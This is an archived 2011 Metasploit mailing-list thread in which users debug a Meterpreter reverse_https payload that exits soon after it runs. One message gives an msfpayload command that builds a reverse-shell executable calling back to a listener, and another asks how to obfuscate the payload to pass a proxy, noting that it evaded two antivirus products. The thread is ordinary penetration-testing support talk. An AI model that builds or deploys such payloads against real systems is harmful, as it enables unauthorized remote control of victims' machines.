Metasploit mailing list archives
Re: Meterpreter Reverse_HTTPS dies
From: Jerry <g.kassaras () googlemail com>
Date: Wed, 9 Mar 2011 18:48:58 +0200
It does ssl reverse proxy ....

Sent from my iPhone

On 9 Mar 2011, at 18:31, ricky-lee birtles <mr.r.birtles () gmail com> wrote:

> https
>
> Regards,
> --
> Mr R Birtles
>
> On 9 March 2011 13:10, Gerasimos Kassaras <g.kassaras () googlemail com> wrote:
>
>> I am working on a project with John Mistikopoulos and we are trying to
>> pass a restrictive proxy web server. Any ideas about obfuscating the
>> payload? So far I have tried:
>>
>> 1. Executables and failed (as expected)
>> 2. VBS and failed (This time it failed on desktop)
>>
>> On 9 March 2011 14:45, JOhn Mistikopoulos <mailtest1223133456 () gmail com> wrote:
>>
>>> I changed the ip of the listener from 0.0.0.0 to the real IP and it worked.
>>> Thanks everyone for the help!
>>> --
>>> John
>>>
>>> On Sat, Mar 5, 2011 at 12:02 AM, Rob Fuller <mubix () room362 com> wrote:
>>>
>>>> try setting LHOST on the listener to the IP of the host instead of 0.0.0.0.
>>>> This is why I asked for a start to finish script. That way we aren't
>>>> shooting in the dark guessing what the problem might be.
>>>>
>>>> Please copy from the point you make the binary to the point you pasted in
>>>> the original email, paste it to a paste bin, change your IP info to
>>>> something like 192.168.0.1 (attacker) and 192.168.0.2 (victim) so we can
>>>> better assist you.
>>>> --
>>>> Rob Fuller | Mubix
>>>> Certified Checkbox Unchecker
>>>> Room362.com | Hak5.org
>>>>
>>>> On Fri, Mar 4, 2011 at 9:28 AM, JOhn Mistikopoulos <mailtest1223133456 () gmail com> wrote:
>>>>
>>>>> Yeah, reverse_tcp works great. I have pasted the logs here:
>>>>> http://mail.metasploit.com/pipermail/framework/2011-February/007516.html
>>>>>
>>>>> Additionally, I've created the payload with the following command:
>>>>>
>>>>> msfpayload windows/meterpreter/reverse_https LHOST=x.x.x.x LPORT=443 X >/tmp/https.exe
>>>>>
>>>>> and started a multihandler listening at 0.0.0.0:443.
>>>>>
>>>>> On Thu, Mar 3, 2011 at 6:03 PM, Rob Fuller <mubix () room362 com> wrote:
>>>>>
>>>>>> Does a different payload work? reverse_tcp for example. And
>>>>>> reverse_https doesn't use ActiveX so you shouldn't be seeing an
>>>>>> iexplorer.exe running unless of course that's what you named your
>>>>>> payload. It could be a problem on your listener end.
>>>>>>
>>>>>> Can you pastebin your process from start to finish? What exploit are you
>>>>>> running? Is it just a built binary?
>>>>>> --
>>>>>> Rob Fuller | Mubix
>>>>>> Certified Checkbox Unchecker
>>>>>> Room362.com | Hak5.org
>>>>>>
>>>>>> On Thu, Mar 3, 2011 at 4:00 AM, JOhn Mistikopoulos <mailtest1223133456 () gmail com> wrote:
>>>>>>
>>>>>>> I have tried numerous scenarios such as:
>>>>>>>
>>>>>>> 1. Middle proxy servers (more than 3 different web proxy software)
>>>>>>> 2. A single proxy server
>>>>>>> 3. No proxy server
>>>>>>> 4. Over the internet and locally (get the same error)
>>>>>>> 5. Tested with different service packs (WinXP SP1, SP3, Win7)
>>>>>>> 6. Tested with IE6, unpatched.
>>>>>>> 7. Tested with different user accounts and group policies.
>>>>>>> 8. Tested in Symantec and McAfee Endpoint protection (none marked it as
>>>>>>>    a threat)
>>>>>>> 9. Tested without any AV protection or Firewall-IPS.
>>>>>>>
>>>>>>> When I run the payload (for example the "exe" file in an unprotected PC -
>>>>>>> no AV, no IPS) I got its name on the task manager just for a while and
>>>>>>> then it dies. However I don't see any instance of iexplorer.exe running.
>>>>>>>
>>>>>>> On Wed, Mar 2, 2011 at 5:35 PM, HD Moore <hdm () metasploit com> wrote:
>>>>>>>
>>>>>>>> On 2/28/2011 6:13 AM, JOhn Mistikopoulos wrote:
>>>>>>>>> And then, the listener stops giving any other info. I went to the
>>>>>>>>> victim PC and realized that the payload exe had already died. I
>>>>>>>>> couldn't see it on the task manager. Concurrently, I had been running
>>>>>>>>> wireshark. The two last packets were:
>>>>>>>>> 1. Victim => Listener (RST, ACK)
>>>>>>>>> 2. Listener => Victim (FIN, ACK)
>>>>>>>>> Finally I don't get any connections. Does anyone know how to fix this?
>>>>>>>>
>>>>>>>> Is there any network proxy/filter between the target and yourself? Is
>>>>>>>> the target running an endpoint protection product or HIPS? Is the
>>>>>>>> target process a user-process (IE) or a system process (assuming
>>>>>>>> IE/user-land)?
>>>>>>>>
>>>>>>>> The reverse_https payload is finicky based on the WinInet profile of
>>>>>>>> the user running the code.
>>>>>>>>
>>>>>>>> -HD
>>
>> --
>> Regards
>> Gerasimos Kassaras
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Feb 28)
- Re: Meterpreter Reverse_HTTPS dies HD Moore (Mar 02)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 03)
- Re: Meterpreter Reverse_HTTPS dies Rob Fuller (Mar 03)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 04)
- Re: Meterpreter Reverse_HTTPS dies Rob Fuller (Mar 04)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies Gerasimos Kassaras (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies ricky-lee birtles (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies Jerry (Mar 09)
- Re: Meterpreter Reverse_HTTPS dies JOhn Mistikopoulos (Mar 03)
- Re: Meterpreter Reverse_HTTPS dies HD Moore (Mar 02)
- Re: Meterpreter Reverse_HTTPS dies c0lists (Mar 03)